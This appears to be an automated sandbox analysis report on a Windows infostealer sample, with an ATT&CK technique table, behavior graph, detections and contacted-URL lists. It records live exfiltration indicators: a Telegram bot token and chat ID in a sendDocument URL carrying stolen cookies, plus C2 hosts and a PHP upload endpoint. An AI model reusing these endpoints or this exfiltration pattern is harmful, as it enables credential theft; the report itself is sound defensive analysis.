              System Time Discovery              		Remote Services11
              Archive Collected Data              		1
              Web Service              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Deobfuscate/Decode Files or Information              		21
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		4
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt2
              Valid Accounts              		2
              Valid Accounts              		3
              Obfuscated Files or Information              		Security Account Manager2
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		11
              Encrypted Channel              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron2
              Registry Run Keys / Startup Folder              		21
              Access Token Manipulation              		1
              DLL Side-Loading              		NTDS137
              System Information Discovery              		Distributed Component Object Model21
              Input Capture              		1
              Non-Standard Port              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script312
              Process Injection              		1
              Masquerading              		LSA Secrets331
              Security Software Discovery              		SSH3
              Clipboard Data              		4
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
              Registry Run Keys / Startup Folder              		2
              Valid Accounts              		Cached Domain Credentials131
              Virtualization/Sandbox Evasion              		VNCGUI Input Capture25
              Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
              Virtualization/Sandbox Evasion              		DCSync3
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
              Access Token Manipulation              		Proc Filesystem11
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
              Process Injection              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
              System Network Configuration Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1481105 Sample: DSD876543456780000.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 3 other IPs or domains 2->34 42 Multi AV Scanner detection for domain / URL 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 52 11 other signatures 2->52 8 DSD876543456780000.exe 6 2->8         started        12 wscript.exe 1 2->12         started        signatures3 48 Tries to detect the country of the analysis system (by using the IP) 30->48 50 Uses the Telegram API (likely for C&C communication) 32->50 process4 file5 26 C:\Users\user\AppData\Local\...\chordates.exe, PE32 8->26 dropped 60 Binary is likely a compiled AutoIt script file 8->60 62 Found API chain indicative of sandbox detection 8->62 14 chordates.exe 3 8->14         started        64 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->64 18 chordates.exe 2 12->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\...\chordates.vbs, data 14->28 dropped 66 Multi AV Scanner detection for dropped file 14->66 68 Binary is likely a compiled AutoIt script file 14->68 70 Machine Learning detection for dropped file 14->70 76 3 other signatures 14->76 20 svchost.exe 15 2 14->20         started        72 Writes to foreign memory regions 18->72 74 Maps a DLL or memory area into another process 18->74 24 svchost.exe 2 18->24         started        signatures9 process10 dnsIp11 36 api.telegram.org 149.154.167.220, 443, 49721, 49735 TELEGRAMRU United Kingdom 20->36 38 checkip.dyndns.com 158.101.44.242, 49704, 49707, 49709 ORACLE-BMC-31898US United States 20->38 40 2 other IPs or domains 20->40 54 System process connects to network (likely due to code injection or exploit) 24->54 56 Tries to steal Mail credentials (via file / registry access) 24->56 58 Tries to harvest and steal browser information (history, passwords, etc) 24->58 signatures12

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              DSD876543456780000.exe38%ReversingLabsWin32.Infostealer.Tinba
              DSD876543456780000.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\nonsubmerged\chordates.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\nonsubmerged\chordates.exe38%ReversingLabsWin32.Infostealer.Tinba

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              reallyfreegeoip.org0%VirustotalBrowse
              api.telegram.org2%VirustotalBrowse
              mail.vvtrade.vn0%VirustotalBrowse
              checkip.dyndns.com0%VirustotalBrowse
              checkip.dyndns.org0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://checkip.dyndns.org0%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              http://checkip.dyndns.org/0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://checkip.dyndns.org/q0%URL Reputationsafe
              https://reallyfreegeoip.org0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/0%URL Reputationsafe
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
              https://api.telegram.org0%Avira URL Cloudsafe
              https://www.office.com/0%Avira URL Cloudsafe
              https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
              https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
              https://api.telegram.org/bot0%Avira URL Cloudsafe
              https://api.telegram.org1%VirustotalBrowse
              https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
              https://duckduckgo.com/ac/?q=0%VirustotalBrowse
              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20a0%Avira URL Cloudsafe
              https://www.office.com/0%VirustotalBrowse
              https://www.office.com/lB0%Avira URL Cloudsafe
              https://api.telegram.org/bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443825857&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery0%Avira URL Cloudsafe
              http://c.pki.goog/we1/OuqGbJkzwhU.crl00%Avira URL Cloudsafe
              http://c.pki.goog/we1/OuqGbJkzwhU.crl00%VirustotalBrowse
              http://c.pki.goog/r/gsr1.crl00%Avira URL Cloudsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
              http://c.pki.goog/r/gsr1.crl00%VirustotalBrowse
              https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
              https://www.office.com/lB0%VirustotalBrowse
              https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
              https://api.telegram.org/bot1%VirustotalBrowse
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
              http://varders.kozow.com:80810%Avira URL Cloudsafe
              https://api.telegram.org/bot/sendMessage?chat_id=&text=0%VirustotalBrowse
              https://chrome.google.com/webstore?hl=en0%VirustotalBrowse
              https://api.telegram.org/bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=64430%Avira URL Cloudsafe
              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20a1%VirustotalBrowse
              http://o.pki.goog/s/we1/Ges0%0%Avira URL Cloudsafe
              http://aborters.duckdns.org:8081100%Avira URL Cloudmalware
              http://51.38.247.67:8081/_send_.php?L0%Avira URL Cloudsafe
              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2027/07/2024%20/%2004:25:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
              http://varders.kozow.com:808115%VirustotalBrowse
              http://mail.vvtrade.vn0%Avira URL Cloudsafe
              http://o.pki.goog/s/we1/Ges0%0%VirustotalBrowse
              http://anotherarmy.dns.army:8081100%Avira URL Cloudmalware
              http://51.38.247.67:8081/_send_.php?L3%VirustotalBrowse
              http://aborters.duckdns.org:808112%VirustotalBrowse
              http://i.pki.goog/gsr1.crt0-0%Avira URL Cloudsafe
              http://mail.vvtrade.vn0%VirustotalBrowse
              http://c.pki.goog/r/r4.crl00%Avira URL Cloudsafe
              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2025/07/2024%20/%2010:29:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
              https://chrome.google.com/webstore?hl=enlB0%Avira URL Cloudsafe
              http://api.telegram.org0%Avira URL Cloudsafe
              http://i.pki.goog/r4.crt00%Avira URL Cloudsafe
              http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%Avira URL Cloudsafe
              http://i.pki.goog/we1.crt050%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              reallyfreegeoip.org
              		188.114.97.3
              		truetrueunknown
              api.telegram.org
              		149.154.167.220
              		truetrueunknown
              mail.vvtrade.vn
              		118.69.190.131
              		truetrueunknown
              checkip.dyndns.com
              		158.101.44.242
              		truetrueunknown
              checkip.dyndns.org
              		unknown
              		unknowntrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://api.telegram.org/bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443825857&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recoverytrue
              • Avira URL Cloud: safe
              		unknown
              https://reallyfreegeoip.org/xml/8.46.123.33true
              • URL Reputation: safe
              		unknown
              http://checkip.dyndns.org/true
              • URL Reputation: safe
              		unknown
              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2027/07/2024%20/%2004:25:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dtrue
              • Avira URL Cloud: safe
              		unknown
              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2025/07/2024%20/%2010:29:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dtrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://www.office.com/svchost.exe, 00000006.00000002.4473666032.0000000005749000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.000000000573A000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://duckduckgo.com/chrome_newtabsvchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://duckduckgo.com/ac/?q=svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://api.telegram.orgsvchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.00000000052F0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmptrue
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://www.google.com/images/branding/product/ico/googleg_lodp.icosvchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://api.telegram.org/botsvchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmptrue
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20asvchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://c.pki.goog/we1/OuqGbJkzwhU.crl0svchost.exe, 00000006.00000002.4471801244.0000000003482000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://www.office.com/lBsvchost.exe, 00000003.00000002.4473198929.0000000005337000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005744000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://c.pki.goog/r/gsr1.crl0svchost.exe, 00000006.00000003.2598293666.0000000007D24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4472062178.0000000003495000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://checkip.dyndns.orgsvchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://api.telegram.org/bot/sendMessage?chat_id=&text=svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://chrome.google.com/webstore?hl=ensvchost.exe, 00000006.00000002.4473666032.0000000005718000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://www.ecosia.org/newtab/svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://varders.kozow.com:8081svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmpfalse
              • 15%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://o.pki.goog/s/we1/Ges0%svchost.exe, 00000006.00000002.4471801244.0000000003482000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://api.telegram.org/bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443svchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://aborters.duckdns.org:8081svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmpfalse
              • 12%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              https://ac.ecosia.org/autocomplete?q=svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://51.38.247.67:8081/_send_.php?Lsvchost.exe, 00000003.00000002.4473198929.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056D9000.00000004.00000800.00020000.00000000.sdmpfalse
              • 3%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://reallyfreegeoip.org/xml/8.46.123.33$svchost.exe, 00000003.00000002.4473198929.000000000524E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005208000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005670000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005617000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.000000000565C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://mail.vvtrade.vnsvchost.exe, 00000003.00000002.4473198929.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056D9000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://anotherarmy.dns.army:8081svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://i.pki.goog/gsr1.crt0-svchost.exe, 00000006.00000003.2598293666.0000000007D24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4472062178.0000000003495000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://c.pki.goog/r/r4.crl0svchost.exe, 00000006.00000002.4471702197.0000000003476000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsvchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://checkip.dyndns.org/qsvchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://chrome.google.com/webstore?hl=enlBsvchost.exe, 00000006.00000002.4473666032.0000000005713000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://reallyfreegeoip.orgsvchost.exe, 00000003.00000002.4473198929.000000000524E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.00000000051DE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005670000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://i.pki.goog/r4.crt0svchost.exe, 00000006.00000002.4471702197.0000000003476000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://api.telegram.orgsvchost.exe, 00000003.00000002.4473198929.00000000052F0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesvchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://i.pki.goog/we1.crt05svchost.exe, 00000006.00000002.4471801244.0000000003482000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedsvchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
